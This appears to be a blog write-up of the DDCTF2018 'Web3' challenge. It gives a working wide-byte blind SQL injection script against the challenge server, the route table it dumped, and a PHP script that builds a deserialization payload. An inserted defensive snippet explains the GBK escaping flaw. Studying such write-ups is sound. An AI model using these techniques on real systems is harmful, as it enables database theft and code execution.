The title of this challenge makes it very clear that it is about encoding, and a Baidu link was left in the page source.

https://wenku.baidu.com/view/bd29b7b3fd0a79563c1e72f7.html


Referenced: "宽字节注入深入研究" (An in-depth study of wide-byte injection).

In the end I found the corresponding string.

I then wrote the corresponding injection script:

import requests

res = ""

# Boolean-based blind injection: recover the result one character position at a time.
# The leading 廄 followed by ' is the wide-byte trick: the backslash that the server
# inserts before the quote becomes the trailing byte of a multibyte character,
# so the quote itself survives.
for j in range(1, 1000):
    for i in range(32, 128):
        url = "http://116.85.48.105:5033/ab393ca3-0736-4ac3-8fb5-5461d803ea87/well/getmessage/廄' or (ascii(substr((SELECT group_concat(concat(id,0x3a,pattern,0x3a,action,0x3a,rulepass)) from route_rules),{0},1))={1})%23".format(j, i)
        # Retry the request until it goes through
        while True:
            try:
                content = requests.get(url).text
            except requests.RequestException:
                continue
            break

        if "test1" in content:      # true branch: the guessed character matched
            res += chr(i)
            print(res)
            break
    else:
        # No character matched at this position: the string is complete
        break
print(res)
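As an added illustration (not part of this write-up), the snippet below shows why the wide-byte prefix used in the script defeats byte-level escaping when the database connection speaks GBK, and the check a defender would use instead: decode strictly in the connection charset first and escape at the character level (or simply use parameterized queries). The input bytes are constructed to mirror the 廄' prefix above; the function names are my own.

```python
from typing import Optional

# Constructed input: the UTF-8 bytes of 廄 (E5 BB 84) followed by a single quote,
# mirroring the 廄' prefix in the injection script above.
CONSTRUCTED_INPUT = "廄".encode("utf-8") + b"'"   # E5 BB 84 27


def addslashes_bytes(data: bytes) -> bytes:
    """Byte-level escaping in the style of PHP's addslashes(): a backslash (0x5C)
    is inserted before ', ", \\ and NUL without regard to the charset."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def server_view(data: bytes) -> str:
    """What a GBK-speaking server sees after byte-level escaping.
    errors="replace" mimics a lenient decoder; here the sequence 84 5C forms a
    valid GBK character, so the escaping backslash is swallowed."""
    return addslashes_bytes(data).decode("gbk", errors="replace")


def quote_survives_gbk(data: bytes) -> bool:
    """True if the server still sees an unescaped quote after escaping."""
    text = server_view(data)
    return "'" in text and "\\'" not in text


def escape_after_strict_decode(data: bytes, charset: str = "gbk") -> Optional[str]:
    """Defensive variant: decode strictly in the connection charset, reject
    malformed input (returns None), then escape at the character level so the
    backslash can never be absorbed into a multibyte character."""
    try:
        text = data.decode(charset)   # 84 27 is not valid GBK -> UnicodeDecodeError
    except UnicodeDecodeError:
        return None
    return text.replace("\\", "\\\\").replace("'", "\\'")


if __name__ == "__main__":
    print("escaped bytes :", addslashes_bytes(CONSTRUCTED_INPUT))
    print("server sees   :", repr(server_view(CONSTRUCTED_INPUT)))
    print("quote survives:", quote_survives_gbk(CONSTRUCTED_INPUT))
    print("strict path   :", escape_after_strict_decode(CONSTRUCTED_INPUT))
```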

With this injection, all of the challenge's routes can be read out:

id   pattern                           action                            rulepass
1    get*/:u/well/getmessage/:s        Well#getmessage                   cd4229e671a8830debfcbb049a23399c
12   get*/:u/justtry/self/:s           JustTry#self                      5ed16f9c7c27cb846eaf15c19fe40093
13   post*/:u/justtry/try              JustTry#try                       3228ad498d5a20d1d22d6a4a15fed4d2
15   static/bootstrap/css/backup.css   static/bootstrap/css/backup.zip

Notice the backup.zip: requesting static/bootstrap/css/backup.css downloads it.

That yields part of the challenge's source code.

The try method in Justtry.php clearly has a deserialization vulnerability; what remains is to construct a payload that yields the flag.

<?php
namespace Index\Helper;

// The classes involved in the deserialization chain; getflag is stubbed to simply echo.
class Test {
    public $user_uuid;
    public $fl;

    // Runs when the object is destroyed, i.e. right after unserialize()
    public function __destruct() {
        $this->getflag('ctfuser', $this->user_uuid);
    }

    public function getflag($m = 'ctfuser', $u = 'default')
    {
        $user = array(
            'name' => $m,
            'id'   => $u
        );
        // Being lazy: just echoing it straight out for you
        $this->fl = new Flag();
        echo 'DDCTF{}';
    }
}

class Flag {
    public $sql;
    public function __construct()
    {
        $this->sql = new SQL();
    }
}

class SQL {
    public $dbc;
    public $pdo;
}

class Justtry
{
    // The vulnerable sink: URL-decoded user input goes straight into unserialize()
    function ttt($serialize)
    {
        print "PlainText:\n";
        unserialize(urldecode($serialize));
    }
}

// Build the object graph and print its serialized form, raw and URL-encoded
$object = new Test();
$object->user_uuid = "ab393ca3-0736-4ac3-8fb5-5461d803ea87";
$object->fl = new Flag();
echo serialize($object) . "\n";
echo urlencode(serialize($object));

echo "\n\n\n\n\n\n";
// Feed the payload through the same sink locally to confirm it triggers __destruct()
$obj = new Justtry();
$obj->ttt(urlencode(serialize($object)));


This gives the deserialization payload.

Permalink: DDCTF2018 WEB3 注入的奥妙 WRITEUP (The Mystery of Injection)

Original article; when reposting please credit: reposted from Lz1y's Blog
